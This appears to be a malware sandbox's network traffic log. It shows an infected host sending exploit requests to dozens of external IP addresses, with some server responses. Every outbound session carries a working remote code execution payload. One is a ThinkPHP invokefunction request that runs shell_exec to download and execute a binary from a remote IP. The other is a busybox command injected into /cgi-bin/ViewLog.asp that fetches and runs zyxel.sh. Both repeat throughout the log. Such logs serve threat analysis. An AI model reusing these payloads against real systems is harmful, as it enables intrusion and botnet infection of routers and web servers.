Feb 14, 2024 09:29:03.645272970 CET	399	IN	Data Raw: 53 65 72 76 65 72 3a 20 47 6f 41 68 65 61 64 2d 57 65 62 73 0d 0a 44 61 74 65 3a 20 57 65 64 20 46 65 62 20 31 34 20 31 37 3a 32 39 3a 30 33 20 32 30 32 34 0d 0a 50 72 61 67 6d 61 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 Data Ascii: Server: GoAhead-WebsDate: Wed Feb 14 17:29:03 2024Pragma: no-cacheCache-Control: no-cacheContent-Type: text/htmlSet-Cookie: (null)Location: http://127.0.0.1:8899/login.asp<html><head></head><body>This document has moved to

Session ID	Source IP	Source Port	Destination IP	Destination Port
63	192.168.2.15	53522	112.30.175.165	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:03.417771101 CET	319	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0

Session ID	Source IP	Source Port	Destination IP	Destination Port
64	192.168.2.15	42750	94.177.134.165	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:03.439055920 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:03.634959936 CET	1286	IN	HTTP/1.0 400 Bad Request Server: squid/3.1.9 Mime-Version: 1.0 Date: Tue, 06 Apr 2021 05:24:21 GMT Content-Type: text/html Content-Length: 3161 X-Squid-Error: ERR_INVALID_URL 0 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 20 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 20 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 20 20 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 0a 68 74 6d 6c 20 62 6f 64 79 20 7b 0a 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 65 66 65 66 65 66 3b 0a 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 09 63 6f 6c 6f 72 3a 20 23 31 65 31 65 31 65 3b 0a 7d 0a 0a 2f 2a 20 50 61 67 65 20 64 69 73 70 6c 61 79 65 64 20 74 69 74 6c 65 20 61 72 65 61 20 2a 2f 0a 23 74 69 74 6c 65 73 20 7b 0a 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 31 35 70 78 3b 0a 09 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 09 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 31 30 30 70 78 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 75 72 6c 28 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 71 75 69 64 2d 63 61 63 68 65 2e 6f 72 67 2f 41 72 74 77 6f 72 6b 2f 53 4e 2e 70 6e 67 27 29 20 6e 6f 2d 72 65 70 65 61 74 20 6c 65 66 74 3b 0a 7d 0a 0a 2f 2a 20 69 6e 69 74 69 61 6c 20 74 69 74 6c 65 20 2a 2f 0a 23 74 69 74 6c 65 73 20 68 31 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0a 7d 0a 23 74 69 74 6c 65 73 20 68 32 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0a 7d 0a 0a 2f 2a 20 73 70 65 63 69 61 6c 20 65 76 65 6e 74 3a 20 46 54 50 20 73 75 63 63 65 73 73 20 70 61 67 65 20 74 69 74 6c 65 73 20 2a 2f 0a 23 74 69 74 6c 65 73 20 66 74 70 73 75 63 63 65 73 73 20 7b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 66 66 30 30 3b 0a 09 77 69 64 74 68 3a 31 30 30 25 3b 0a 7d 0a 0a 2f 2a 20 50 61 67 65 20 64 69 73 70 6c 61 79 65 64 20 62 6f 64 79 20 63 6f 6e 74 65 6e 74 20 61 72 65 61 20 2a 2f 0a 23 63 6f 6e 74 65 6e 74 20 7b 0a 09 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 66 66 66 3b Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html><head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>ERROR: The requested URL could not be retrieved</title> <style type="text/css">... /* Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License// Page basics / {font-family: verdana, sans-serif;}html body {margin: 0;padding: 0;background: #efefef;font-size: 12px;color: #1e1e1e;}/* Page displayed title area /#titles {margin-left: 15px;padding: 10px;padding-left: 100px;background: url('http://www.squid-cache.org/Artwork/SN.png') no-repeat left;}/ initial title /#titles h1 {color: #000000;}#titles h2 {color: #000000;}/ special event: FTP success page titles /#titles ftpsuccess {background-color:#00ff00;width:100%;}/ Page displayed body content area */#content {padding: 10px;background: #ffffff;

Session ID	Source IP	Source Port	Destination IP	Destination Port
65	192.168.2.15	59552	112.196.74.193	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:03.444659948 CET	319	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0

Session ID	Source IP	Source Port	Destination IP	Destination Port
66	192.168.2.15	56052	112.197.165.134	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:03.449615955 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:29:03.825534105 CET	339	IN	HTTP/1.0 400 Bad Request Date: Wed, 14 Feb 2024 15:29:03 GMT Server: Boa/0.94.14rc21 Accept-Ranges: bytes Connection: close Content-Type: text/html; charset=ISO-8859-1 Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 3e 3c 48 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 31 3e 0a 59 6f 75 72 20 63 6c 69 65 6e 74 20 68 61 73 20 69 73 73 75 65 64 20 61 20 6d 61 6c 66 6f 72 6d 65 64 20 6f 72 20 69 6c 6c 65 67 61 6c 20 72 65 71 75 65 73 74 2e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>400 Bad Request</TITLE></HEAD><BODY><H1>400 Bad Request</H1>Your client has issued a malformed or illegal request.</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
67	192.168.2.15	60618	31.136.230.212	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:03.464579105 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:04.154934883 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:05.530838013 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:08.378736019 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:14.010627985 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:25.018258095 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:48.057600975 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:33.112401962 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
68	192.168.2.15	51180	31.136.184.119	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:03.465403080 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:04.154912949 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:05.530829906 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:08.378732920 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:14.010642052 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:25.018254995 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:48.057614088 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:33.112384081 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
69	192.168.2.15	48370	94.131.113.32	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:03.488434076 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:03.746242046 CET	47	IN	HTTP/1.1 400 Bad Request Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port
70	192.168.2.15	34958	94.123.13.6	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:03.489135027 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
71	192.168.2.15	39438	31.200.49.231	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:03.491192102 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
72	192.168.2.15	54130	94.123.101.239	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:03.491517067 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
73	192.168.2.15	42458	62.29.6.123	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:03.492799044 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
74	192.168.2.15	43542	94.120.212.18	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:03.492863894 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
75	192.168.2.15	59754	85.209.139.168	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:03.494755983 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
